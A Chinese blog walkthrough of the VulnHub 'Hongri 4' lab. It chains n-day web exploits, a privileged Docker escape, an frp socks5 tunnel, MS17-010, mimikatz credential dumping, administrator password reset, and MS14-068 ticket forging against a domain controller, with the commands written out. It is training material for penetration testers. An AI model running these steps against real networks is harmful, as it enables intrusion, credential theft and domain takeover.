打靶 - VulnHub - 红日(四)

前言

打算把自己打过的靶的记录更新到博客中,主要更新一些常见的渗透思路和有意义的靶机(那些专门为打靶而设计还考考CTF的啥的就没必要看了)一是为了方便师傅跟着我打靶的顺序来直接打,二就是记录一下自己打靶的经历吧

本次打靶算是中等难度,可以去学习下关于内网穿透和常见后渗透技巧 涉及知识点如下

  1. 信息收集
  2. Nday
  3. Docker逃逸
  4. 内网穿透
  5. 域渗透
  6. 进程注入

信息收集

端口扫描

1
2
3
masscan -p 1-65535 192.168.111.138 --rate=10000

nmap -sV 192.168.111.138 -sC -p 2002,2001,2003,22

image

Nday

可以看到 2001是struts2 2002是tomcat 2003是phpmyadmin,应该都存在漏洞,先拿nday打2001

image

找到入口上webshell

但是发现存在Dockerfile

image

Docker逃逸

判断一下是否是在docker里头

image

确实是在docker环境,那么现在就有两种解决办法

  1. 逃逸当前docker
  2. 还有其他端口,看是否其他端口为docker 如果都是docker,是否有存在某个docker可以进行逃逸呢

emm查看了一下发现不是特权模式,再去看看别的端口

tomcat是put文件上传

phpmyadmin是文件包含getshell

一番寻找后在tomcat的容器当中发现了tomcat是通过特权模式进行启动的

image

逃逸成功

image

这里应该是可以写定时任务的 但是没复现成功诶 奇奇怪怪 于是就写ssh的公钥和私钥进行私钥上ssh了

1
2
3
我们使用kali先生成一对密钥
ssh-keygen -f shell #然后按三次回车即可 默认生成在用户目录下的.ssh文件夹内 密钥名为shell
shell是私钥,shell.pub是公钥,我们只需要把公钥写入到目标机器,就可以指定私钥去进行登录

还有个思路就是反弹计时任务 但是都不行 只好直接连接密码了

得到当前机子的shell了

进行linux的信息收集

ifconfig

image

传fscan上去扫一下他的C段

image

内网穿透打MS17010

那么隧道进ubuntu打ms17010

先把frpc传到ubuntu上然后后台运行frpc

1
2
3
4
5
6
7
8
9
10
11
12
nohup ./frpc -c frpc.ini >/dev/null 2>&1 & #后台运行

frpc.ini

[common]
server_addr = 192.168.184.129
server_port = 444

[socks5]
type = tcp
plugin=socks5
remote_port = 5000

image

然后给msf上全局代理走本机的5000端口的socks5

1
setg proxies socks5:127.0.0.1:5000

发现存在两台主机,并且都存在ms17010于是直接上msf直接开打

image

域渗透

bg一下再打过另一台

但是一直没成功 不知道是不是DC的原因确实是没拿下,可能题目设计就是打不通ms17010吧(不然都直接拿下域控了)

1
chcp 65001 #修改编码为utf-8 乱码   936为GBK

进来后kiwi抓一下密码先

1
2
load kiwi
creds_all

image

可以抓到时明文的密码 douser:Dotest123

那我们现在就两个思路

  1. 利用明文密码进行横向到DC
  2. 域提权漏洞直接打DC

但现在我需要模拟一下存在杀毒的情况,执行的操作都不可以,那么思路就是进3389把杀毒给关掉

1
netstat -ano | findstr 3389

发现并没有开3389 于是就让他开起来

然后用kali里面的FreeRDP进行连接

1
2
3
4
5
xfreerdp /u:douser /p:Dotest123 /v:192.168.183.130:3389 /tls-seclevel:0 /timeout:80000

或者是
rdesktop 192.168.183.130

image

修改一下administrator的密码重新登录把

改完发现还得改一下停用信息

1
2
net user administrator Admin123
net user administrator /active:yes

image

进程注入

既然已经进去了administrator了 msf上迁移注入一下域用户

1
ps -aux

image

1
migrate 1800

image

通过这个用户来上线CS

但是折腾半天上线不了CS啊

域提权

只好直接用域提权漏洞直接打了

先拿到域内用户的SID

1
2
whoami /all 
S-1-5-21-979886063-1111900045-1414766810-1107

image

1
MS14-068.exe -u douser@demo.com -s S-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.183.138 -p Dotest123

image

得到一个TGT然后mimikaz导入后再进行横向

1
2
3
4
5
6
7
8
mimikatz.exe
kerberos::list #查看全部凭证

kerberos::purge #先清空一下凭证

kerberos::ptc TGT_douser@demo.com.ccache

dir \\WIN-ENS2VR5TR3N\c$

拓扑分析

image


打靶 - VulnHub - 红日(四)
https://zjackky.github.io/post/target-vulnhub-red-day-4-idb1b.html
作者
Zjacky
发布于
2023年9月20日
许可协议